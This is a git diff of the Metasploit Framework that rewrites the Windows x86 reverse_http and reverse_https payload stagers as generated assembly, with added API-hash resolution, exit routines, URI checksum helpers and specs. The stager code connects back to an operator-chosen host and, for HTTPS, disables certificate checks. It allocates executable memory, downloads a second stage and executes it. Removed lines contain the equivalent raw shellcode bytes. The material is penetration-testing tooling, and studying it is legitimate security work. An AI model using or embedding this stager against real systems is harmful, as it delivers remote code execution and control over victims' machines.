diff --git a/lib/msf/core/handler/reverse_http/uri_checksum.rb b/lib/msf/core/handler/reverse_http/uri_checksum.rb index 96e76baec3..fca2a371b6 100644 --- a/lib/msf/core/handler/reverse_http/uri_checksum.rb +++ b/lib/msf/core/handler/reverse_http/uri_checksum.rb @@ -76,8 +76,11 @@ module Msf # Create a URI that matches a given checksum # # @param sum [Fixnum] The checksum value you are trying to create a URI for + # @param len [Fixnum] An optional length value for the created URI # @return [String] The URI string that checksums to the given value - def generate_uri_checksum(sum) + def generate_uri_checksum(sum,len=nil) + return generate_uri_checksum_with_length(sum, len) if len + chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a 32.times do uri = Rex::Text.rand_text_alphanumeric(3) @@ -90,6 +93,35 @@ module Msf return URI_CHECKSUM_PRECALC[sum] end + # Create an arbitrary length URI that matches a given checksum + # + # @param sum [Fixnum] The checksum value you are trying to create a URI for + # @param len [Fixnum] The length of the created URI + # @return [String] The URI string that checksums to the given value + def generate_uri_checksum_with_length(sum, len) + # Lengths shorter than 4 bytes are unable to match all possible checksums + # Lengths of exactly 4 are relatively slow to find for high checksum values + # Lengths of 5 or more bytes find a matching checksum fairly quickly (~80ms) + raise ArgumentError, "Length must be 5 bytes or greater" if len < 5 + + # Funny enough, this was more efficient than calculating checksum offsets + if len < 40 + loop do + uri = Rex::Text.rand_text_alphanumeric(len) + return uri if Rex::Text.checksum8(uri) == sum + end + end + + # The rand_text_alphanumeric() method becomes a bottleneck at around 40 bytes + # Calculating a static prefix flattens out the average runtime for longer URIs + prefix = Rex::Text.rand_text_alphanumeric(len-20) + + loop do + uri = prefix + Rex::Text.rand_text_alphanumeric(20) + return uri if Rex::Text.checksum8(uri) == sum + end + end + end end end diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb index 26856d4444..a6fcf932fa 100644 --- a/lib/msf/core/payload/windows.rb +++ b/lib/msf/core/payload/windows.rb @@ -150,5 +150,12 @@ module Msf::Payload::Windows return true end + # + # Share the EXITFUNC mappings with other classes + # + def self.exit_types + @@exit_types.dup + end + end diff --git a/lib/msf/core/payload/windows/block_api.rb b/lib/msf/core/payload/windows/block_api.rb new file mode 100644 index 0000000000..c1fbbf5da1 --- /dev/null +++ b/lib/msf/core/payload/windows/block_api.rb @@ -0,0 +1,112 @@ +# -*- coding: binary -*- + +require 'msf/core' + +module Msf + + +### +# +# Basic block_api stubs for Windows ARCH_X86 payloads +# +### + + +module Payload::Windows::BlockApi + + def asm_block_api(opts={}) + + raw = %q^ + + api_call: + pushad ; We preserve all the registers for the caller, bar EAX and ECX. + mov ebp, esp ; Create a new stack frame + xor eax, eax ; Zero EAX (upper 3 bytes will remain zero until function is found) + mov edx, [fs:eax+48] ; Get a pointer to the PEB + mov edx, [edx+12] ; Get PEB->Ldr + mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list + next_mod: ; + mov esi, [edx+40] ; Get pointer to modules name (unicode string) + movzx ecx, word [edx+38] ; Set ECX to the length we want to check + xor edi, edi ; Clear EDI which will store the hash of the module name + loop_modname: ; + lodsb ; Read in the next byte of the name + cmp al, 'a' ; Some versions of Windows use lower case module names + jl not_lowercase ; + sub al, 0x20 ; If so normalise to uppercase + not_lowercase: ; + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + loop loop_modname ; Loop untill we have read enough + + ; We now have the module hash computed + push edx ; Save the current position in the module list for later + push edi ; Save the current module hash for later + ; Proceed to iterate the export address table + mov edx, [edx+16] ; Get this modules base address + mov ecx, [edx+60] ; Get PE header + + ; use ecx as our EAT pointer here so we can take advantage of jecxz. + mov ecx, [ecx+edx+120] ; Get the EAT from the PE header + jecxz get_next_mod1 ; If no EAT present, process the next module + add ecx, edx ; Add the modules base address + push ecx ; Save the current modules EAT + mov ebx, [ecx+32] ; Get the rva of the function names + add ebx, edx ; Add the modules base address + mov ecx, [ecx+24] ; Get the number of function names + ; now ecx returns to its regularly scheduled counter duties + + ; Computing the module hash + function hash + get_next_func: ; + jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module + dec ecx ; Decrement the function name counter + mov esi, [ebx+ecx*4] ; Get rva of next module name + add esi, edx ; Add the modules base address + xor edi, edi ; Clear EDI which will store the hash of the function name + ; And compare it to the one we want + loop_funcname: ; + lodsb ; Read in the next byte of the ASCII function name + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + cmp al, ah ; Compare AL (the next byte from the name) to AH (null) + jne loop_funcname ; If we have not reached the null terminator, continue + add edi, [ebp-8] ; Add the current module hash to the function hash + cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for + jnz get_next_func ; Go compute the next function hash if we have not found it + + ; If found, fix up stack, call the function and then value else compute the next one... + pop eax ; Restore the current modules EAT + mov ebx, [eax+36] ; Get the ordinal table rva + add ebx, edx ; Add the modules base address + mov cx, [ebx+2*ecx] ; Get the desired functions ordinal + mov ebx, [eax+28] ; Get the function addresses table rva + add ebx, edx ; Add the modules base address + mov eax, [ebx+4*ecx] ; Get the desired functions RVA + add eax, edx ; Add the modules base address to get the functions actual VA + ; We now fix up the stack and perform the call to the desired function... + finish: + mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad + pop ebx ; Clear off the current modules hash + pop ebx ; Clear off the current position in the module list + popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered + pop ecx ; Pop off the origional return address our caller will have pushed + pop edx ; Pop off the hash value our caller will have pushed + push ecx ; Push back the correct return value + jmp eax ; Jump into the required function + ; We now automagically return to the correct caller... + + get_next_mod: ; + pop edi ; Pop off the current (now the previous) modules EAT + get_next_mod1: ; + pop edi ; Pop off the current (now the previous) modules hash + pop edx ; Restore our position in the module list + mov edx, [edx] ; Get the next module + jmp.i8 next_mod ; Process this module + ^ + end + + +end + +end + diff --git a/lib/msf/core/payload/windows/exitfunk.rb b/lib/msf/core/payload/windows/exitfunk.rb new file mode 100644 index 0000000000..3d6e61935c --- /dev/null +++ b/lib/msf/core/payload/windows/exitfunk.rb @@ -0,0 +1,79 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows' +module Msf + + +### +# +# Implements arbitrary exit routines for Windows ARCH_X86 payloads +# +### + +module Payload::Windows::Exitfunk + + def asm_exitfunk(opts={}) + + asm = "exitfunk:\n" + + case opts[:exitfunk] + + when 'seh' + asm << %Q^ + mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['seh']} + push.i8 0 ; push the exit function parameter + push ebx ; push the hash of the exit function + call ebp ; SetUnhandledExceptionFilter(0) + push.i8 0 + ret ; Return to NULL (crash) + ^ + + # On Windows Vista, Server 2008, and newer, it is not possible to call ExitThread + # on WoW64 processes, instead we need to call RtlExitUserThread. This stub will + # automatically generate the right code depending on the selected exit method. + + when 'thread' + asm << %Q^ + mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['thread']} + push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" ) + call ebp ; GetVersion(); (AL will = major version and AH will = minor version) + cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7 + jl exitfunk_goodbye ; Then just call the exit function... + cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7... + jne exitfunk_goodbye ; + mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread + exitfunk_goodbye: ; We now perform the actual call to the exit function + push.i8 0 ; push the exit function parameter + push ebx ; push the hash of the exit function + call ebp ; call ExitThread(0) || RtlExitUserThread(0) + ^ + + when 'process', nil + asm << %Q^ + mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['process']} + push.i8 0 ; push the exit function parameter + push ebx ; push the hash of the exit function + call ebp ; ExitProcess(0) + ^ + + when 'sleep' + asm << %Q^ + mov ebx, #{"0x%.8x" % Rex::Text.ror13_hash('Sleep')} + push 300000 ; 300 seconds + push ebx ; push the hash of the function + call ebp ; Sleep(300000) + jmp exitfunk ; repeat + ^ + else + # Do nothing and continue after the end of the shellcode + end + + asm + end + + +end + +end + diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb new file mode 100644 index 0000000000..5cd16869ca --- /dev/null +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -0,0 +1,333 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/block_api' +require 'msf/core/payload/windows/exitfunk' + +module Msf + + +### +# +# Complex payload generation for Windows ARCH_X86 that speak HTTP(S) +# +### + + +module Payload::Windows::ReverseHttp + + include Msf::Payload::Windows::BlockApi + include Msf::Payload::Windows::Exitfunk + + # + # Register reverse_http specific options + # + def initialize(*args) + super + register_advanced_options( + [ + OptInt.new('HTTPStagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']) + ], self.class) + end + + # + # Generate the first stage + # + def generate + # Generate the simple version of this stager if we don't have enough space + if self.available_space.nil? || required_space > self.available_space + return generate_reverse_http( + ssl: false, + host: datastore['LHOST'], + port: datastore['LPORT'], + url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW)) + end + + conf = { + ssl: false, + host: datastore['LHOST'], + port: datastore['LPORT'], + url: generate_uri, + exitfunk: datastore['EXITFUNC'] + } + + generate_reverse_http(conf) + end + + # + # Generate and compile the stager + # + def generate_reverse_http(opts={}) + combined_asm = %Q^ + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. + #{asm_block_api} + start: + pop ebp + #{asm_reverse_http(opts)} + ^ + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string + end + + # + # Generate the URI for the initial stager + # + def generate_uri + + uri_req_len = datastore['HTTPStagerURILength'].to_i + + # Choose a random URI length between 30 and 255 bytes + if uri_req_len == 0 + uri_req_len = 30 + rand(256-30) + end + + if uri_req_len < 5 + raise ArgumentError, "Minimum HTTPStagerURILength is 5" + end + + "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len) + end + + # + # Determine the maximum amount of space required for the features requested + # + def required_space + # Start with our cached default generated size + space = cached_size + + # Add 100 bytes for the encoder to have some room + space += 100 + + # Make room for the maximum possible URL length + space += 256 + + # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) + space += 31 + + # The final estimated size + space + end + + # + # Dynamic payload generation + # + def asm_reverse_http(opts={}) + + # + # options should contain: + # ssl: (true|false) + # url: "/url_to_request" + # host: [hostname] + # port: [port] + # exitfunk: [process|thread|seh|sleep] + # + + http_open_flags = 0 + + if opts[:ssl] + #;0x80000000 | ; INTERNET_FLAG_RELOAD + #;0x04000000 | ; INTERNET_NO_CACHE_WRITE + #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION + #;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT + #;0x00000200 | ; INTERNET_FLAG_NO_UI + #;0x00800000 | ; INTERNET_FLAG_SECURE + #;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID + #;0x00001000 ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID + http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000 ) + else + #;0x80000000 | ; INTERNET_FLAG_RELOAD + #;0x04000000 | ; INTERNET_NO_CACHE_WRITE + #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION + #;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT + #;0x00000200 ; INTERNET_FLAG_NO_UI + http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 ) + end + + asm = %Q^ + ;-----------------------------------------------------------------------------; + ; Author: HD Moore + ; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000 + ; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1) + ; Version: 1.0 + ;-----------------------------------------------------------------------------; + + ; Input: EBP must be the address of 'api_call'. + ; Output: EDI will be the socket for the connection to the server + ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) + load_wininet: + push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. + push 0x696e6977 ; ... + push esp ; Push a pointer to the "wininet" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "wininet" ) + + set_retry: + push.i8 8 ; retry 8 times should be enough + pop edi + xor ebx, ebx ; push 8 zeros ([1]-[8]) + mov ecx, edi + push_zeros: + push ebx + loop push_zeros + + internetopen: + ; DWORD dwFlags [1] + ; LPCTSTR lpszProxyBypass (NULL) [2] + ; LPCTSTR lpszProxyName (NULL) [3] + ; DWORD dwAccessType (PRECONFIG = 0) [4] + ; LPCTSTR lpszAgent (NULL) [5] + push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + call ebp + + internetconnect: + ; DWORD_PTR dwContext (NULL) [6] + ; dwFlags [7] + push.i8 3 ; DWORD dwService (INTERNET_SERVICE_HTTP) + push ebx ; password (NULL) + push ebx ; username (NULL) + push #{opts[:port]} ; PORT + call got_server_uri ; double call to get pointer for both server_uri and + server_uri: ; server_host; server_uri is saved in EDI for later + db "#{opts[:url]}", 0x00 + got_server_host: + push eax ; HINTERNET hInternet + push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) + call ebp + + httpopenrequest: + ; dwContext (NULL) [8] + push #{"0x%.8x" % http_open_flags} ; dwFlags + push ebx ; accept types + push ebx ; referrer + push ebx ; version + push edi ; server URI + push ebx ; method + push eax ; hConnection + push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) + call ebp + xchg esi, eax ; save hHttpRequest in esi + + send_request: + ^ + + if opts[:ssl] + asm << %Q^ + ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); + set_security_options: + push 0x00003380 + ;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID + ;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID + ;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE + ;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA + ;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION + mov eax, esp + push.i8 4 ; sizeof(dwFlags) + push eax ; &dwFlags + push.i8 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) + push esi ; hHttpRequest + push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + call ebp + ^ + end + + asm << %Q^ + httpsendrequest: + push ebx ; lpOptional length (0) + push ebx ; lpOptional (NULL) + push ebx ; dwHeadersLength (0) + push ebx ; lpszHeaders (NULL) + push esi ; hHttpRequest + push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) + call ebp + test eax,eax + jnz allocate_memory + + try_it_again: + dec edi + jnz send_request + + ; if we didn't allocate before running out of retries, bail out + ^ + + if opts[:exitfunk] + asm << %Q^ + failure: + call exitfunk + ^ + else + asm << %Q^ + failure: + push 0x56A2B5F0 ; hardcoded to exitprocess for size + call ebp + ^ + end + + asm << %Q^ + allocate_memory: + push.i8 0x40 ; PAGE_EXECUTE_READWRITE + push 0x1000 ; MEM_COMMIT + push 0x00400000 ; Stage allocation (4Mb ought to do us) + push ebx ; NULL as we dont care where the allocation is + push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); + + download_prep: + xchg eax, ebx ; place the allocated base address in ebx + push ebx ; store a copy of the stage base address on the stack + push ebx ; temporary storage for bytes read count + mov edi, esp ; &bytesRead + + download_more: + push edi ; &bytesRead + push 8192 ; read length + push ebx ; buffer + push esi ; hRequest + push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + call ebp + + test eax,eax ; download failed? (optional?) + jz failure + + mov eax, [edi] + add ebx, eax ; buffer += bytes_received + + test eax,eax ; optional? + jnz download_more ; continue until it returns 0 + pop eax ; clear the temporary storage + + execute_stage: + ret ; dive into the stored stage address + + got_server_uri: + pop edi + call got_server_host + + server_host: + db "#{opts[:host]}", 0x00 + ^ + + if opts[:exitfunk] + asm << asm_exitfunk(opts) + end + asm + end + + # + # Do not transmit the stage over the connection. We handle this via HTTPS + # + def stage_over_connection? + false + end + + # + # Always wait at least 20 seconds for this payload (due to staging delays) + # + def wfs_delay + 20 + end + + +end + +end + diff --git a/lib/msf/core/payload/windows/reverse_https.rb b/lib/msf/core/payload/windows/reverse_https.rb new file mode 100644 index 0000000000..b22ebbe048 --- /dev/null +++ b/lib/msf/core/payload/windows/reverse_https.rb @@ -0,0 +1,63 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/reverse_http' + +module Msf + + +### +# +# Complex payload generation for Windows ARCH_X86 that speak HTTPS +# +### + + +module Payload::Windows::ReverseHttps + + include Msf::Payload::Windows::ReverseHttp + + # + # Generate and compile the stager + # + def generate_reverse_https(opts={}) + combined_asm = %Q^ + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. + #{asm_block_api} + start: + pop ebp + #{asm_reverse_http(opts)} + ^ + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string + end + + # + # Generate the first stage + # + def generate + + # Generate the simple version of this stager if we don't have enough space + if self.available_space.nil? || required_space > self.available_space + return generate_reverse_https( + host: datastore['LHOST'], + port: datastore['LPORT'], + url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW), + ssl: true) + end + + conf = { + ssl: true, + host: datastore['LHOST'], + port: datastore['LPORT'], + url: generate_uri, + exitfunk: datastore['EXITFUNC'] + } + + generate_reverse_https(conf) + end + +end + +end + diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index d4b6328d7c..94bb21082d 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -6,14 +6,15 @@ require 'msf/core' require 'msf/core/handler/reverse_http' - +require 'msf/core/payload/windows/reverse_http' module Metasploit3 - CachedSize = 322 + CachedSize = 306 include Msf::Payload::Stager include Msf::Payload::Windows + include Msf::Payload::Windows::ReverseHttp def initialize(info = {}) super(merge_info(info, @@ -24,68 +25,6 @@ module Metasploit3 'Platform' => 'win', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseHttp, - 'Convention' => 'sockedi http', - 'Stager' => - { - 'Offsets' => - { - # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now) - # 'EXITFUNC' => [ 240, 'V' ], - 'LPORT' => [ 177, 'v' ], # Not a typo, really little endian - }, - 'Payload' => - "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" + - "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" + - "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" + - "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" + - "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" + - "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" + - "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" + - "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" + - "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" + - "\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" + - "\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" + - "\x68\x5C\x11\x00\x00\xE8\x72\x00\x00\x00\x2F\x31\x32\x33\x34\x35" + - "\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x02\x60\x84\x53\x53" + - "\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x53\x53\x53\x53" + - "\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A\x4F\x75\xED\x68" + - "\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00" + - "\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57" + - "\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0" + - "\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5F\xE8\x8F\xFF" + - "\xFF\xFF" - } - )) - end - - # - # Do not transmit the stage over the connection. We handle this via HTTPS - # - def stage_over_connection? - false - end - - # - # Generate the first stage - # - def generate - p = super - i = p.index("/12345\x00") - u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00" - p[i, u.length] = u - - lhost = datastore['LHOST'] || '127.127.127.127' - if Rex::Socket.is_ipv6?(lhost) - lhost = "[#{lhost}]" - end - - p + lhost + "\x00" - end - - # - # Always wait at least 20 seconds for this payload (due to staging delays) - # - def wfs_delay - 20 + 'Convention' => 'sockedi http')) end end diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 2821b0be3c..92ea6ee42f 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -6,14 +6,16 @@ require 'msf/core' require 'msf/core/handler/reverse_https' +require 'msf/core/payload/windows/reverse_https' module Metasploit3 - CachedSize = 327 + CachedSize = 326 include Msf::Payload::Stager include Msf::Payload::Windows + include Msf::Payload::Windows::ReverseHttps def initialize(info = {}) super(merge_info(info, @@ -24,64 +26,7 @@ module Metasploit3 'Platform' => 'win', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseHttps, - 'Convention' => 'sockedi https', - 'Stager' => - { - 'Offsets' => - { - # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now) - # 'EXITFUNC' => [ 260, 'V' ], - 'LPORT' => [ 177, 'v' ], # Not a typo, really little endian - }, - 'Payload' => - "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" + - "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" + - "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" + - "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" + - "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" + - "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" + - "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" + - "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" + - "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" + - "\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" + - "\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" + - "\x68\x5C\x11\x00\x00\xE8\x86\x00\x00\x00\x2F\x31\x32\x33\x34\x35" + - "\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x32\xE0\x84\x53\x53" + - "\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x68\x80\x33\x00" + - "\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5" + - "\x53\x53\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A" + - "\x4F\x75\xD9\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00" + - "\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53" + - "\x53\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2" + - "\xFF\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3" + - "\x5F\xE8\x7B\xFF\xFF\xFF" - - } - )) + 'Convention' => 'sockedi https')) end - # - # Do not transmit the stage over the connection. We handle this via HTTPS - # - def stage_over_connection? - false - end - - # - # Generate the first stage - # - def generate - p = super - i = p.index("/12345\x00") - u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00" - p[i, u.length] = u - p + datastore['LHOST'].to_s + "\x00" - end - - # - # Always wait at least 20 seconds for this payload (due to staging delays) - # - def wfs_delay - 20 - end end diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index ee236022f8..08fe6ef5a6 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' - +#require 'msf/core/payload/windows/x64/reverse_https' module Metasploit3 diff --git a/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb b/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb index 51d83619a3..7051b82e5a 100644 --- a/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb +++ b/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb @@ -9,6 +9,7 @@ describe Msf::Handler::ReverseHttp::UriChecksum do subject(:dummy_object) { DummyClass.new } it { should respond_to :generate_uri_checksum} + it { should respond_to :generate_uri_checksum_with_length} it { should respond_to :process_uri_resource} describe '#generate_uri_checksum' do @@ -28,6 +29,18 @@ describe Msf::Handler::ReverseHttp::UriChecksum do end end + describe '#generate_uri_checksum_with_length' do + [0, 80, 88, 90, 92, 98, 255, 127].each do |checksum_value| + [5,30,50,100,127].each do |uri_length| + it "generates a #{uri_length} byte string that checksums back to the original value (#{checksum_value})" do + uri_string = dummy_object.generate_uri_checksum_with_length(checksum_value, uri_length) + expect(Rex::Text.checksum8(uri_string)).to eq checksum_value + end + end + end + + end + describe '#process_uri_resource' do context 'when passed a value for INITW' do let(:uri) { "/7E37v"}